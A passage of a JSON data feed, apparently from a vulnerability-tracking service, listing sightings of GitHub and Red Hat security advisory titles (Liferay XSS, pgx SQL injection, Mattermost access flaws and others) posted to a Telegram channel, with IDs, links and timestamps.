"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQG8-VFV7-8FJ8", "type": "seen", "source": "https://t.me/ctinow/199626", "content": "https://ift.tt/McdKyov\n[GHSA-fqg8-vfv7-8fj8] JSONata expression can pollute the \"Object\" prototype", "creation_timestamp": "2024-03-04T21:56:38.000000Z"}, {"uuid": "86a7218a-fcd7-402f-965e-444c7d2cfbd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4PF-3V7R-HH55", "type": "seen", "source": "https://t.me/ctinow/199625", "content": "https://ift.tt/7Ksl0fF\n[GHSA-r4pf-3v7r-hh55] electron-builder's NSIS installer - execute arbitrary code on the target machine (Windows only)", "creation_timestamp": "2024-03-04T21:56:37.000000Z"}, {"uuid": "e797bbab-999f-480a-b3b9-e339cbe8f0a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q6H8-4J2V-PJG4", "type": "seen", "source": "https://t.me/ctinow/193833", "content": "https://ift.tt/Y1tZUgi\n[GHSA-q6h8-4j2v-pjg4] Minder trusts client-provided mapping from repo name to upstream ID", "creation_timestamp": "2024-02-26T23:26:38.000000Z"}, {"uuid": "16b751e6-5a7a-4663-9f01-c0e3c1d0452f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-672R-97R7-VX2Q", "type": "seen", "source": "https://t.me/ctinow/193832", "content": "https://ift.tt/UZGgFOo\n[GHSA-672r-97r7-vx2q] pretix mishandles file validation", "creation_timestamp": "2024-02-26T23:26:37.000000Z"}, {"uuid": "5f65956c-76ce-48fb-b483-01bd6693b62f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-785G-282Q-PWVX", "type": "seen", "source": "https://t.me/ctinow/193831", "content": "https://ift.tt/g0SKOiC\n[GHSA-785g-282q-pwvx] Rack CORS Middleware has Insecure File Permissions", "creation_timestamp": "2024-02-26T23:26:36.000000Z"}, {"uuid": "7bf58465-b7a9-462f-a3f5-16a2b5161b5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M7WR-2XF7-CM9P", "type": "seen", "source": "https://t.me/ctinow/199615", "content": "https://ift.tt/KAInzix\n[GHSA-m7wr-2xf7-cm9p] pgx SQL Injection via Line Comment Creation", "creation_timestamp": "2024-03-04T21:26:22.000000Z"}, {"uuid": "95262399-91c3-4184-b3ed-3dfc5b243ac0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MRH-MX7X-RQJX", "type": "seen", "source": "https://t.me/ctinow/189868", "content": "https://ift.tt/apfRHUn\nCVE-2024-23822 | sni Thruk up to 3.11 File Upload path traversal (GHSA-4mrh-mx7x-rqjx)", "creation_timestamp": "2024-02-21T18:16:20.000000Z"}, {"uuid": "cfcac19d-3124-442e-96c7-f163bc7ce5cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QPQ-6W89-F7MX", "type": "seen", "source": "https://t.me/ctinow/189054", "content": "https://ift.tt/MTtjCAp\n[GHSA-3qpq-6w89-f7mx] Pimcore Host Header Injection in user invitation link", "creation_timestamp": "2024-02-21T00:56:29.000000Z"}, {"uuid": "84c28c0b-8be0-410f-b76f-b4e8a0eb54dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1007", "type": "seen", "source": "https://t.me/ctinow/194551", "content": "https://ift.tt/yFCd2M9\nRHSA-2024:1007: Important: gimp:2.8 security update", "creation_timestamp": "2024-02-27T16:16:50.000000Z"}, {"uuid": "78e9e28a-33cf-4a0f-beec-43d63c8cf086", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1013", "type": "seen", "source": "https://t.me/ctinow/195151", "content": "https://ift.tt/87VuLF2\nRHSA-2024:1013: Important: edk2 security update", "creation_timestamp": "2024-02-28T07:16:37.000000Z"}, {"uuid": "b6528c25-5967-4a1b-aee7-dedb9cb3b1bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3955", "type": "seen", "source": "https://t.me/ctinow/194354", "content": "https://ift.tt/SUx41dp\nCVE-2019-13723 | Google Chrome prior 78.0.3904.108 WebBluetooth HTML Page use after free (RHSA-2019:3955)", "creation_timestamp": "2024-02-27T13:17:01.000000Z"}, {"uuid": "86428742-87b0-4248-a69e-bda6941e4482", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1004", "type": "seen", "source": "https://t.me/ctinow/194353", "content": "https://ift.tt/VNBld25\nRHSA-2024:1004: Important: edk2 security update", "creation_timestamp": "2024-02-27T13:17:01.000000Z"}, {"uuid": "95daccea-a328-4550-af61-c5465e646dd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0269", "type": "seen", "source": "https://t.me/ctinow/195036", "content": "https://ift.tt/hiUeZFB\nRHSA-2024:0269: Moderate: Run Once Duration Override Operator for Red Hat OpenShift 1.1.0 for RHEL 9", "creation_timestamp": "2024-02-28T02:16:42.000000Z"}, {"uuid": "e2918b8b-94e4-4fe3-a82d-e257df001d02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0941", "type": "seen", "source": "https://t.me/ctinow/195035", "content": "https://ift.tt/uRPwyVC\nRHSA-2024:0941: Important: OpenShift Container Platform 4.14.14 bug fix and security update", "creation_timestamp": "2024-02-28T02:16:41.000000Z"}, {"uuid": "11731e0b-f1e5-445c-b286-32307c616f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0944", "type": "seen", "source": "https://t.me/ctinow/195034", "content": "https://ift.tt/xizr6qL\nRHSA-2024:0944: Moderate: OpenShift Container Platform 4.14.14 packages and security update", "creation_timestamp": "2024-02-28T02:16:40.000000Z"}, {"uuid": "263b4586-783f-483b-8596-eab021e9cf6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1074", "type": "seen", "source": "https://t.me/ctinow/199822", "content": "https://ift.tt/OZvQKV5\nRHSA-2024:1074: Moderate: 389-ds:1.4 security update", "creation_timestamp": "2024-03-05T02:17:30.000000Z"}, {"uuid": "51b95d62-266f-4728-849c-e873338a35a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRWW-27VC-GGHV", "type": "seen", "source": "https://t.me/ctinow/199629", "content": "https://ift.tt/lBkTW2A\n[GHSA-mrww-27vc-gghv] pgx SQL Injection via Protocol Message Size Overflow", "creation_timestamp": "2024-03-04T21:56:42.000000Z"}, {"uuid": "4593f718-0277-45c4-8269-3c4a876198aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JWH-3VRQ-Q3M8", "type": "seen", "source": "https://t.me/ctinow/199628", "content": "https://ift.tt/e0WP87p\n[GHSA-7jwh-3vrq-q3m8] pgproto3 SQL Injection via Protocol Message Size Overflow", "creation_timestamp": "2024-03-04T21:56:40.000000Z"}, {"uuid": "e921abda-fa6a-4d32-9adb-d3368a2ec7e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JR83-M233-GG6P", "type": "seen", "source": "https://t.me/ctinow/199627", "content": "https://ift.tt/rRHPEgO\n[GHSA-jr83-m233-gg6p] Sulu grants access to pages regardless of role permissions", "creation_timestamp": "2024-03-04T21:56:39.000000Z"}, {"uuid": "ba320be7-77ea-4bc7-a4d0-1f688f17b0d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1072", "type": "seen", "source": "https://t.me/ctinow/199602", "content": "https://ift.tt/nKrOLA6\nRHSA-2024:1072: Moderate: Red Hat Ansible Automation Platform 2.4 Container Release Security and Bug Fix Update", "creation_timestamp": "2024-03-04T21:16:53.000000Z"}, {"uuid": "e380d7c8-3794-4c6f-b7f9-727be35e0c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4082", "type": "seen", "source": "https://t.me/ctinow/194119", "content": "https://ift.tt/WapV2Jz\nCVE-2019-10213 | Openshift Container Platform 4.1/4.2 Debug Log neutralization for logs (RHSA-2019:4082)", "creation_timestamp": "2024-02-27T08:46:44.000000Z"}, {"uuid": "a8b85acc-c78e-4389-b31c-1617bfa2b5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3309", "type": "seen", "source": "https://t.me/ctinow/194118", "content": "https://ift.tt/5vMlTr7\nCVE-2019-10207 | Linux Kernel up to 3.x/4.17.x/5.x Bluetooth null pointer dereference (RHSA-2019:3309)", "creation_timestamp": "2024-02-27T08:46:43.000000Z"}, {"uuid": "c0ae8d6e-706d-4356-8f1e-aee2bed8c375", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGR6-6HHW-883F", "type": "seen", "source": "https://t.me/ctinow/190262", "content": "https://ift.tt/UfOK3eV\n[GHSA-hgr6-6hhw-883f] Liferay Portal Calendar module and Liferay DXP vulnerable to Cross-site Scripting, content spoofing", "creation_timestamp": "2024-02-22T00:46:21.000000Z"}, {"uuid": "b5aa3e78-0101-4278-9058-e26885d3363d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWHV-HVJ2-QRQM", "type": "seen", "source": "https://t.me/ctinow/190261", "content": "https://ift.tt/pQYu2eC\n[GHSA-rwhv-hvj2-qrqm] Liferay Portal Frontend JS module's portlet.js and Liferay DXP vulnerable to Cross-site Scripting", "creation_timestamp": "2024-02-22T00:46:20.000000Z"}, {"uuid": "27a53579-8dcb-40dc-b27d-e934083b5bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWXC-4CMW-7X75", "type": "seen", "source": "https://t.me/ctinow/190260", "content": "https://ift.tt/hZ5TmgR\n[GHSA-rwxc-4cmw-7x75] Liferay Portal and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T00:46:19.000000Z"}, {"uuid": "47a690d3-dc98-46a0-a7f4-21a6095d8c11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-468X-FRCM-GHX6", "type": "seen", "source": "https://t.me/ctinow/190259", "content": "https://ift.tt/FfWqUBt\n[GHSA-468x-frcm-ghx6] Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-22T00:46:18.000000Z"}, {"uuid": "053313e2-8463-4c28-8df5-4c4137cd73c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73X3-8MRG-5R93", "type": "seen", "source": "https://t.me/ctinow/190258", "content": "https://ift.tt/fZOJtkh\n[GHSA-73x3-8mrg-5r93] Liferay Portal Language Override edit screen and Liferay DXP vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-22T00:46:17.000000Z"}, {"uuid": "4f83cd15-fbd8-4665-9366-20b263b709f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54PV-R62J-9QQC", "type": "seen", "source": "https://t.me/ctinow/190251", "content": "https://ift.tt/Utf9e2K\n[GHSA-54pv-r62j-9qqc] Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-22T00:36:20.000000Z"}, {"uuid": "4b4b093b-ec11-4053-b053-c8a31c4ce773", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CR36-3VQF-X5W5", "type": "seen", "source": "https://t.me/ctinow/190250", "content": "https://ift.tt/MNbT5wY\n[GHSA-cr36-3vqf-x5w5] Liferay Portal Expando module and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T00:36:19.000000Z"}, {"uuid": "2e0c088f-ef4f-4a7d-84e1-9651d63792b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P28X-4R5H-PH6J", "type": "seen", "source": "https://t.me/ctinow/190249", "content": "https://ift.tt/iFeRmUM\n[GHSA-p28x-4r5h-ph6j] Liferay Portal Message Board widget and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T00:36:18.000000Z"}, {"uuid": "6071b3b8-1913-45f4-b10d-ec9a0344e6b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V2XQ-M22W-JMPR", "type": "seen", "source": "https://t.me/ctinow/190248", "content": "https://ift.tt/SbFAhJd\n[GHSA-v2xq-m22w-jmpr] Liferay Portal and Liferay DXP's Users Admin module vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T00:36:16.000000Z"}, {"uuid": "cfcb7e16-c4bc-4569-9ac9-0b5cd202b8d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XPJG-7HX7-WGCX", "type": "seen", "source": "https://t.me/ctinow/190247", "content": "https://ift.tt/ftTS9Nz\n[GHSA-xpjg-7hx7-wgcx] Liferay Portal and Liferay DXP vulnerable to Cross-site Scripting", "creation_timestamp": "2024-02-22T00:36:15.000000Z"}, {"uuid": "1125723d-f60c-4d3d-98e6-669270cfac27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q2CV-7J58-RFMJ", "type": "seen", "source": "https://t.me/ctinow/190238", "content": "https://ift.tt/qNvHuoy\n[GHSA-q2cv-7j58-rfmj] Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T00:21:50.000000Z"}, {"uuid": "6dfc1444-5cd5-4795-b099-4630b06f68a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3172", "type": "seen", "source": "https://t.me/ctinow/194356", "content": "https://ift.tt/H69G38x\nCVE-2019-14825 | Katello up to 3.12.0.8 Password Storage Credentials cleartext transmission (RHSA-2019:3172)", "creation_timestamp": "2024-02-27T13:17:07.000000Z"}, {"uuid": "63aaa11c-5257-40cc-b184-17f1345bceb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3955", "type": "seen", "source": "https://t.me/ctinow/194355", "content": "https://ift.tt/HpzKqMP\nCVE-2019-13724 | Google Chrome prior 78.0.3904.108 WebBluetooth HTML Page out-of-bounds write (RHSA-2019:3955)", "creation_timestamp": "2024-02-27T13:17:02.000000Z"}, {"uuid": "c98cbc8c-af54-445a-806f-93b5a23478e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1070", "type": "seen", "source": "https://t.me/ctinow/199604", "content": "https://ift.tt/GfP3lYq\nRHSA-2024:1070: Important: postgresql:12 security update", "creation_timestamp": "2024-03-04T21:16:55.000000Z"}, {"uuid": "401ef1b1-ccf4-4077-a840-444d2780dbd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7CC2-R658-7XPF", "type": "seen", "source": "https://t.me/ctinow/199631", "content": "https://ift.tt/c9mso58\n[GHSA-7cc2-r658-7xpf] Coder's OIDC authentication allows email with partially matching domain to register", "creation_timestamp": "2024-03-04T21:56:44.000000Z"}, {"uuid": "780b54de-28b1-419b-88c3-71139f732b7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8W9-5WCG-VFJ7", "type": "seen", "source": "https://t.me/ctinow/199630", "content": "https://ift.tt/8B5nAjm\n[GHSA-r8w9-5wcg-vfj7] Mio's tokens for named pipes may be delivered after deregistration", "creation_timestamp": "2024-03-04T21:56:43.000000Z"}, {"uuid": "b6aae5ae-869e-4db1-8da6-52c46c70d054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1235", "type": "seen", "source": "https://t.me/ctinow/202743", "content": "https://ift.tt/M31sFwa\nRHSA-2024:1235: Important: openvswitch3.1 security update", "creation_timestamp": "2024-03-07T20:16:37.000000Z"}, {"uuid": "91116ee8-8c65-4792-93b0-395562a73d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5MXF-42F5-J782", "type": "seen", "source": "https://t.me/ctinow/202749", "content": "https://ift.tt/OgdAD8U\n[GHSA-5mxf-42f5-j782] Grafana's users with permissions to create a data source can CRUD all data sources", "creation_timestamp": "2024-03-07T20:22:03.000000Z"}, {"uuid": "701cdb93-ba0f-4dfe-a80a-28baae813ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1227", "type": "seen", "source": "https://t.me/ctinow/202672", "content": "https://ift.tt/6c5KA7Y\nRHSA-2024:1227: Important: openvswitch3.1 security update", "creation_timestamp": "2024-03-07T19:16:51.000000Z"}, {"uuid": "9ca9d5c4-b35c-45e5-9e20-64aa6e57383c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1234", "type": "seen", "source": "https://t.me/ctinow/202671", "content": "https://ift.tt/CUgYkKR\nRHSA-2024:1234: Important: openvswitch2.17 security update", "creation_timestamp": "2024-03-07T19:16:50.000000Z"}, {"uuid": "6d4f9d92-6f6e-4925-9d84-2f38aff5a760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HHHV-Q57G-882Q", "type": "seen", "source": "https://t.me/ctinow/202663", "content": "https://ift.tt/e7WG6H4\n[GHSA-hhhv-q57g-882q] jose vulnerable to resource exhaustion via specifically crafted JWE with compressed plaintext", "creation_timestamp": "2024-03-07T18:51:56.000000Z"}, {"uuid": "ccea6f87-c98c-4363-aeed-d8974c3a6e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75JP-VQ8X-H4CQ", "type": "seen", "source": "https://t.me/ctinow/202646", "content": "https://ift.tt/0D5Y7d3\n[GHSA-75jp-vq8x-h4cq] Wasmi Out-of-bounds Write for host to Wasm calls with more than 128 Parameters", "creation_timestamp": "2024-03-07T18:37:51.000000Z"}, {"uuid": "aaded974-fde4-41e1-8634-ea7efd613561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRMM-QMRJ-XGP6", "type": "seen", "source": "https://t.me/ctinow/202645", "content": "https://ift.tt/9GTLCml\n[GHSA-mrmm-qmrj-xgp6] PaddlePaddle vulnerable to remote code execution", "creation_timestamp": "2024-03-07T18:37:49.000000Z"}, {"uuid": "a201c16a-3367-410d-be17-ee399302b8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J7JM-8GF5-FRCM", "type": "seen", "source": "https://t.me/ctinow/202644", "content": "https://ift.tt/IsC4W1o\n[GHSA-j7jm-8gf5-frcm] nGrinder vulnerable to unsafe Java objects deserialization", "creation_timestamp": "2024-03-07T18:37:48.000000Z"}, {"uuid": "040762bf-4132-445a-86f9-3a803d3d72db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FH54-3VHG-MPC2", "type": "seen", "source": "https://t.me/ctinow/202642", "content": "https://ift.tt/gbXPW8u\n[GHSA-fh54-3vhg-mpc2] PaddlePaddle command injection vulnerability", "creation_timestamp": "2024-03-07T18:37:46.000000Z"}, {"uuid": "b771193c-8947-4a8f-943d-eb73a4663633", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VM9M-57JR-4PXH", "type": "seen", "source": "https://t.me/ctinow/197134", "content": "https://ift.tt/8Ke9DhV\n[GHSA-vm9m-57jr-4pxh] Mattermost fails to limit the number of role names", "creation_timestamp": "2024-02-29T23:56:29.000000Z"}, {"uuid": "9f7cd678-0882-4a83-a4ff-82f065bb3324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MX3-9QFH-77GJ", "type": "seen", "source": "https://t.me/ctinow/197133", "content": "https://ift.tt/FEM2eTJ\n[GHSA-6mx3-9qfh-77gj] Mattermost denial of service through long emoji value", "creation_timestamp": "2024-02-29T23:56:28.000000Z"}, {"uuid": "18499625-38f4-431a-9a7c-dc0e10436099", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PP4-MX6X-XH36", "type": "seen", "source": "https://t.me/ctinow/201746", "content": "https://ift.tt/EGZn1ov\n[GHSA-9pp4-mx6x-xh36] Jenkins OWASP Dependency-Check Plugin has stored XSS vulnerability", "creation_timestamp": "2024-03-06T20:16:26.000000Z"}, {"uuid": "f901e060-0ce1-4829-b9cd-f503bb57171e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3G35-V53R-GPXC", "type": "seen", "source": "https://t.me/ctinow/197136", "content": "https://ift.tt/xkV4ojf\n[GHSA-3g35-v53r-gpxc] Mattermost race condition", "creation_timestamp": "2024-02-29T23:56:31.000000Z"}, {"uuid": "71456139-cee4-4d87-83c3-72ee6ba24f11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWJF-4667-GQWX", "type": "seen", "source": "https://t.me/ctinow/197135", "content": "https://ift.tt/Vaqhpik\n[GHSA-hwjf-4667-gqwx] Mattermost allows attackers access to posts in channels they are not a member of", "creation_timestamp": "2024-02-29T23:56:30.000000Z"}, {"uuid": "1867d7a0-60cf-47a6-b810-a2b2fe7506be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGXJ-J98C-59RV", "type": "seen", "source": "https://t.me/ctinow/197129", "content": "https://ift.tt/ke6qbwE\n[GHSA-xgxj-j98c-59rv] Mattermost fails to properly restrict the access of files attached to posts", "creation_timestamp": "2024-02-29T23:56:23.000000Z"}, {"uuid": "9bc5d1f0-a37d-4e97-b351-50f8ceda15bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCFX-G2J2-F6F6", "type": "seen", "source": "https://t.me/ctinow/197111", "content": "https://ift.tt/hFQTft9\n[GHSA-pcfx-g2j2-f6f6] Docassemble HTML and javascript injection", "creation_timestamp": "2024-02-29T23:26:25.000000Z"}, {"uuid": "9c686c91-ccc7-499e-899b-98234dd21b26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WXF-R2QV-9XWR", "type": "seen", "source": "https://t.me/ctinow/197112", "content": "https://ift.tt/JL4RQko\n[GHSA-7wxf-r2qv-9xwr] Docassemble open redirect", "creation_timestamp": "2024-02-29T23:26:27.000000Z"}, {"uuid": "c1e11122-bbf6-4c8a-846a-a6863b2f99de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQ57-3W7P-VWVV", "type": "seen", "source": "https://t.me/ctinow/197110", "content": "https://ift.tt/PNXfu7q\n[GHSA-jq57-3w7p-vwvv] Docassemble unauthorized access through URL manipulation", "creation_timestamp": "2024-02-29T23:26:24.000000Z"}, {"uuid": "f1be13c4-b00b-46a4-9983-f3bddde4262e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1061", "type": "seen", "source": "https://t.me/ctinow/197067", "content": "https://ift.tt/9bniAPk\nRHSA-2024:1061: Moderate: Red Hat Satellite 6 security and bug fix update", "creation_timestamp": "2024-02-29T22:16:15.000000Z"}, {"uuid": "d09f6e5b-3bb7-42ad-b0b6-9239c339f75b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1203", "type": "seen", "source": "https://t.me/ctinow/202177", "content": "https://ift.tt/wIfyGog\nRHSA-2024:1203: Important: Red Hat OpenShift for Windows Containers 9.0.1 security update", "creation_timestamp": "2024-03-07T08:16:59.000000Z"}, {"uuid": "f0e367a4-1d00-498c-a2d4-ed10e33a9438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FX48-XV6Q-6GP3", "type": "seen", "source": "https://t.me/ctinow/197131", "content": "https://ift.tt/Ph7HIyo\n[GHSA-fx48-xv6q-6gp3] Mattermost post fetching without auditing in compliance export", "creation_timestamp": "2024-02-29T23:56:25.000000Z"}, {"uuid": "e6bd972f-a505-402b-81fa-4cd333f4e760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PFW6-5RX3-XH3C", "type": "seen", "source": "https://t.me/ctinow/197130", "content": "https://ift.tt/C0dpKMW\n[GHSA-pfw6-5rx3-xh3c] Mattermost fails to check the\u00a0\"invite_guest\" permission", "creation_timestamp": "2024-02-29T23:56:24.000000Z"}, {"uuid": "50aa3114-eb33-4704-9abc-ec965bcf0898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H2M-54WH-GWJ3", "type": "seen", "source": 